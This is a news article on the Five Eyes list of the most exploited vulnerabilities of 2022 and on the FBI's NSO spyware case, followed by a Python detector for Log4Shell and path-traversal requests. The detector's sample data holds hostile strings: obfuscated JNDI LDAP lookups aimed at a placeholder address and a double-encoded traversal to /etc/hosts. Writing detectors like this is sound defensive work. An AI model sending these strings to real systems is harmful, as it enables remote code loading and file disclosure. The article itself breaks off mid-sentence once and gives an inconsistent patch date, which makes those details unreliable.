According to the US Cybersecurity and Infrastructure Security Agency (CISA), cyber attackers in 2022 mainly targeted older software vulnerabilities, particularly unpatched, internet-facing systems.
Mark De Boer
August 6, 2023

https://www.cybernewscentre.com/plus-content/content/the-dirty-dozen-international-agencies-highlight-top-cyber-threats-of-2022


Five Eyes and the Dirty Dozen:

The Five Eyes intelligence alliance, comprising the US, UK, Australia, Canada, and New Zealand, has provided an important resource for cybersecurity professionals: a list of the 12 most exploited vulnerabilities of 2022. The collaboration between these countries emphasises the global nature of the cybersecurity challenge.

According to the US Cybersecurity and Infrastructure Security Agency (CISA), cyber attackers in 2022 mainly targeted older software vulnerabilities, particularly unpatched, internet-facing systems. This points to a concerning trend where many organisations overlook the importance of patching older vulnerabilities, even when new ones emerge.

According to the NCSC advisory, posted on the 3rd of August, the UK and allies reaffirmed

More than half of the top vulnerabilities listed for 2022 also appeared on the previous year’s list, highlighting how malicious cyber actors continued targeting previously disclosed flaws in internet-facing systems – despite security updates being available to fix them. 

Some vulnerabilities highlighted include:

  • Fortinet SSL VPNs: This vulnerability has been known since 2018 and can be exploited through a path traversal bug to control system files. Its persistent exploitation indicates organisations' lax attitude toward timely patching.
  • Zoho ManageEngine ADSelfService Plus: Chinese hackers utilised an RCE vulnerability in this software in late 2021. Despite the release of a patch in September that year, it remains a favourite among attackers.
  • Atlassian's Confluence Server and Data Center: Another software with an RCE vulnerability from 2021 that's still widely exploited.
  • Log4Shell: The Apache Log4j exploit from 2021 that had a global impact is still a prevalent method used by criminals to breach secure systems.

Other vulnerabilities involve Microsoft Exchange, VMware products, iControl REST authentication on F5 BIG-IP products, and Microsoft's Windows Support Diagnostic Tool.

Organisations are advised to review their patch status urgently and prioritise addressing these vulnerabilities to enhance their cybersecurity posture.

The FBI's NSO Spyware Saga:

In an unexpected twist to the saga surrounding the Israeli spyware maker NSO Group, the FBI has discovered that NSO's spyware was purchased and used within the US Government. This revelation comes after the Biden administration was previously found procuring snooping software from the NSO Group.

Notably, the NSO Group was blacklisted by the Biden administration in 2021. Despite this, government contractor Riva Networks acquired NSO's mobile spyware product, Landmark, to secretly track individuals in Mexico. The FBI attributes this controversial purchase to Riva Networks, alleging that they misled the Bureau. Upon discovering the use of Landmark, the contract with Riva was subsequently terminated.

While the Landmark software has been at the centre of this controversy, NSO's more infamous spyware, Pegasus, has a more extensive history of misuse. It's been used globally to target journalists and dissidents. Moreover, NSO has stated that multiple European Union countries had been utilising Pegasus. Adding to the intrigue, the spyware has also been identified on devices used by US diplomats. There's a growing belief among US House officials that Pegasus has been used more extensively against US officials than what is presently acknowledged.

In addition to the top 12 list, the advisory also provides technical details about 30 other routinely exploited vulnerabilities, alongside mitigation advice to help organisations and software developers reduce the risk of compromise.

Jonathon Ellison, NCSC Director of Resilience and Future Technology, said:

“To bolster resilience, we encourage organisations to apply all security updates promptly and call on software vendors to ensure security is at the core of their product design to help shift the burden of responsibility away from consumers.”

The release of the vulnerability list by the Five Eyes nations underscores the ongoing global cybersecurity challenges. In tandem, the unfolding spyware saga involving the FBI underscores the complex, multifaceted nature of modern digital espionage.

Below is the list of the 12 most exploited security flaws last year and relevant links to the National Vulnerability Database entries.

The first spot goes to CVE-2018-13379, a Fortinet SSL VPN vulnerability the company fixed four years ago, in May 2019. The bug was abused by state hackers to breach U.S. government elections support systems.

Malicious cyber actors prioritise exploiting known vulnerabilities, especially within the first two years of their public disclosure, as they offer a low-cost, high-impact avenue for cyber-attacks. As organisations apply timely patches, the value of these vulnerabilities diminishes, pushing actors towards more costly and intricate methods, such as zero-day exploits. The development of exploits is often geared towards severe, prevalent CVEs, and those common in specific target networks. Notably, many exploits rely on sending a distinct malicious web request, which can be detected through advanced inspection methods. This analysis is a collaborative effort of multiple cybersecurity agencies, including CISA, NSA, FBI, and others, to enhance global cybersecurity understanding and response.
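
The point above about exploits arriving as a distinct web request can be made concrete for two of the flaw classes named in this article, Log4Shell-style JNDI lookups and path traversal. The following Python sketch is an added example, not code from the advisory or from the article; the function names, the sample requests and the address 203.0.113.5 are constructed for illustration. It decodes each request before matching, so percent-encoded and nested-lookup forms are inspected in the clear.

```python
import re
from urllib.parse import unquote

# Innermost Log4j-style lookup: "${...}" with no "${" nested inside it.
INNER_LOOKUP = re.compile(r"\$\{[^${}]*\}")
TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")

def decode(value, rounds=3):
    """Percent-decode up to `rounds` times (double encoding), then lowercase."""
    for _ in range(rounds):
        value = unquote(value)
    return value.lower()

def _collapse(match):
    body = match.group(0)[2:-1]
    if ":-" in body:                        # ${name:-default} yields the default
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name in ("lower", "upper"):  # case lookups yield their argument
        return arg
    return match.group(0)                   # other lookups are left as they are

def has_jndi_lookup(value, max_passes=10):
    text = decode(value)
    for _ in range(max_passes):             # collapse one nesting level per pass
        if "${jndi:" in text:
            return True
        text = INNER_LOOKUP.sub(_collapse, text)
    return False

def inspect(request_line, headers):
    """Return sorted finding names for one request line and its headers."""
    target = (request_line.split(" ") + [""])[1]
    findings = set()
    if TRAVERSAL.search(decode(target.split("?", 1)[0])):
        findings.add("path-traversal")
    if any(has_jndi_lookup(v) for v in [target, *headers.values()]):
        findings.add("jndi-lookup")
    return sorted(findings)

# Constructed sample requests; 203.0.113.5 is a documentation address.
SAMPLES = [
    ("GET /index.html HTTP/1.1", {"User-Agent": "Mozilla/5.0"}),
    ("GET /search?q=a HTTP/1.1", {"User-Agent": "${jndi:ldap://203.0.113.5/a}"}),
    ("GET / HTTP/1.1", {"X-Api-Version": "${${lower:j}n${::-d}i:ldap://203.0.113.5/a}"}),
    ("GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1", {}),
    ("GET /static/%252e%252e/%252e%252e/etc/hosts HTTP/1.1", {}),
]
print(*[(inspect(line, hdrs), line) for line, hdrs in SAMPLES], sep="\n")
```

A match here is a triage signal for the request log or proxy, not proof of compromise; patch status of the targeted system decides how urgently it needs follow-up.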
